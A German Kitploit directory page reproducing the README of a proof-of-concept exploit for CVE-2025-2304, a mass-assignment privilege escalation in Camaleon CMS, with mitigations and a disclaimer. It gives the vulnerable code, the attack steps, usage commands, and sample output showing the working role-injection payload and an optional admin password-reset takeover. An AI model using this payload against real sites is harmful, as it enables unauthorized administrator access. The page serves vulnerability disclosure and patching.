Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2304-POC — Proof-of-concept für CVE-2025-2304 — kritische Mass-Assignment-Privilegienerweiterung (CVSS 9.4) in Camaleon CMS. | Kitploit
Tools/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Proof-of-concept für CVE-2025-2304 — kritische Mass-Assignment-Privilegienerweiterung (CVSS 9.4) in Camaleon CMS.

Repository anzeigen
1033vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2304 PoC – Privilegieneskalation in Camaleon CMS

CVE CVSS Python License

Ein Proof-of-Concept-Exploit (PoC) für CVE-2025-2304, eine kritische Mass-Assignment-Schwachstelle in Camaleon CMS, die eine Privilegieneskalation von Benutzern mit niedrigen Berechtigungen zu Administratoren ermöglicht.

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Inhaltsverzeichnis

  • Übersicht
  • Details zur Schwachstelle
  • Funktionen
  • Installation
  • Verwendung
  • Beispiele
  • Betroffene Versionen
  • Gegenmaßnahmen
  • Haftungsausschluss
  • Referenzen
  • Autor

🔍 Übersicht

CVE-2025-2304 ist eine kritische Mass-Assignment-Schwachstelle in Camaleon CMS, die in der Methode updated_ajax des UsersController existiert. Die Schwachstelle beruht auf der Verwendung der gefährlichen Methode permit! in Rails, die alle Parameter ohne jegliche Filterung durchlässt.

Dieser PoC zeigt, wie ein authentifizierter Benutzer mit niedrigen Berechtigungen durch das Injizieren unautorisierter Parameter während Passwortänderungsvorgängen zur Administratorrolle eskalieren kann.

CVSS-Score: 9.4 (Kritisch)

🐛 Details zur Schwachstelle

Ursache

Der anfällige Code verwendet params.require(:user).permit!, das alle benutzerdefinierten Parameter ohne Validierung akzeptiert:

root@kitploit:~
def updated_ajax
  user_params = params.require(:user).permit!  # DANGEROUS!
  current_user.update(user_params)
end

Ausnutzung

Ein Angreifer kann zusätzliche Parameter wie user[role]=admin neben legitimen Passwortänderungsfeldern injizieren, wodurch die Anwendung die Rolle des Benutzers auf Administrator aktualisiert.

Angriffsvektor:

  1. Sich als Benutzer mit niedrigen Berechtigungen authentifizieren (z. B. Rolle „client“)
  2. Eine manipulierte POST-Anfrage an /admin/users/{id}/updated_ajax senden
  3. Den Parameter user[role]=admin injizieren
  4. Die Benutzerrolle eskaliert zum Administrator

✨ Funktionen

  • ✅ Sicheres Testen: Das Benutzerpasswort bleibt während der Ausnutzung erhalten
  • ✅ Mehrere Payloads: Testet 7+ verschiedene Injektionstechniken
  • ✅ Versionserkennung: Erkennt automatisch anfällige CMS-Versionen
  • ✅ Nicht-destruktive Option: --no-password-field-Flag für sicherstes Testen
  • ✅ Proxy-Unterstützung: Integration mit Burp Suite/ZAP für manuelle Analyse
  • ✅ Ausführlicher Modus: Detaillierte Ausgabe zum Debuggen
  • ✅ Admin-Übernahme: Optionaler Angriff auf das Zurücksetzen des Admin-Passworts
  • ✅ Farbcodierte Ausgabe: Klare visuelle Indikatoren für Erfolg/Fehlschlag

📦 Installation

Voraussetzungen

  • Python 3.7+
  • pip (Python-Paketmanager)

Repository klonen

root@kitploit:~
git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Abhängigkeiten installieren

root@kitploit:~
pip install -r requirements.txt

Oder manuell installieren:

root@kitploit:~
pip install requests beautifulsoup4

🚀 Verwendung

Grundlegende Syntax

root@kitploit:~
python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Befehlszeilenoptionen

root@kitploit:~
positional arguments:
  target                Target URL (e.g., http://target.com)

required arguments:
  -u, --username        Existing username for authentication
  -p, --password        User password

optional arguments:
  -h, --help            Show help message and exit
  -v, --verbose         Verbose output (show all requests)
  --proxy PROXY         HTTP proxy for traffic inspection (e.g., http://127.0.0.1:8080)
  --no-password-field   Test exploitation without password fields (safest)
  --skip-admin-test     Skip destructive admin password reset test

📚 Beispiele

Standardtest (empfohlen)

Mit vorhandenen Benutzeranmeldedaten testen, während das Passwort erhalten bleibt:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Sicherster Test (ohne Passwortfelder)

Testen ohne Passwortfelder im Exploit-Payload:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Mit Burp-Suite-Proxy

Verkehr für die manuelle Analyse durch Burp Suite leiten:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Ausführlicher Modus

Detaillierte Ausgabe aktivieren, die alle Anfragen und Antworten zeigt:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Destruktive Tests überspringen

Nur die Privilegieneskalation testen, das Zurücksetzen des Admin-Passworts überspringen:

root@kitploit:~
python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Beispielausgabe

root@kitploit:~
    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 Betroffene Versionen

VersionStatus
< 2.9.1❌ Anfällig
≥ 2.9.1✅ Behoben

Besonders anfällig:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x und früher

🛡️ Gegenmaßnahmen

Sofortmaßnahmen

  1. Upgrade auf Version 2.9.1 oder neuer

    root@kitploit:~
    gem update camaleon_cms
    
  2. Benutzerkonten prüfen

    • Auf unerwartete Berechtigungsänderungen prüfen
    • Protokolle zu Änderungen der Benutzerrollen überprüfen
    • Nach verdächtigen POST-Anfragen an /users/*/updated_ajax suchen
  3. Passwortzurücksetzungen erzwingen (falls kompromittiert)

    • Passwörter für alle privilegierten Konten zurücksetzen
    • Vorhandene Sitzungen ungültig machen

Langfristige Vorbeugung

Sicheres Codemuster:

Ersetzen Sie gefährliches permit! durch explizite Whitelisting:

root@kitploit:~
# Before (VULNERABLE)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# After (SECURE)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

Zusätzliche Sicherheitsmaßnahmen:

  • Implementieren Sie eine strenge Parameterfilterung in der gesamten Anwendung
  • Fügen Sie Genehmigungsworkflows für Rollenänderungen bei kritischen Vorgängen hinzu
  • Aktivieren Sie Audit-Logging für Berechtigungsänderungen
  • Wenden Sie das Prinzip der geringsten Privilegien an
  • Überwachen Sie Mass-Assignment-Versuche über WAF-Regeln

⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Rechtlicher Hinweis:

  • Verwenden Sie dieses Tool nur für Systeme, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Unbefugter Zugriff auf Computersysteme ist nach Gesetzen wie den folgenden illegal:
    • Computer Fraud and Abuse Act (CFAA) in den Vereinigten Staaten
    • Computer Misuse Act 1990 im Vereinigten Königreich
    • Ähnliche Gesetzgebung in anderen Rechtsordnungen
  • Der Autor übernimmt KEINE Haftung für Missbrauch oder durch dieses Tool verursachte Schäden
  • Die Benutzer sind allein für ihre Handlungen verantwortlich

Ethische Nutzung:

  • Holen Sie vor dem Testen die entsprechende Genehmigung ein
  • Befolgen Sie Praktiken verantwortungsvoller Offenlegung
  • Verwenden Sie es in Pentest-Einsätzen mit genehmigtem Umfang
  • Nur für Bildungszwecke in kontrollierten Laborumgebungen

📖 Referenzen

  • CVE-Eintrag: CVE-2025-2304
  • GHSA-Sicherheitshinweis: GHSA-rp28-mvq3-wf8j
  • Herstellerhinweis: Tenable Security Research TRA-2025-09
  • Patch-Commit: GitHub Commit 179fd6b
  • Versionshinweise: Camaleon CMS 2.9.1

👤 Autor

d3vn0mi

  • GitHub: @d3vn0mi
  • Persönliche Website: @d3vn0mi
  • Persönlicher Blog: @d3vn0mi

📝 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

🤝 Mitwirken

Beiträge, Probleme und Funktionsanfragen sind willkommen!

Schauen Sie sich gerne die Issues-Seite an.

⭐ Zeigen Sie Ihre Unterstützung

Hinterlassen Sie einen ⭐️, wenn Ihnen dieses Projekt geholfen hat!


Hinweis: Dieses Repository dient der Sicherheitsforschung und Bildungszwecken. Praktizieren Sie stets verantwortungsvolle Offenlegung und holen Sie vor dem Testen die entsprechende Genehmigung ein.

Tool herunterladen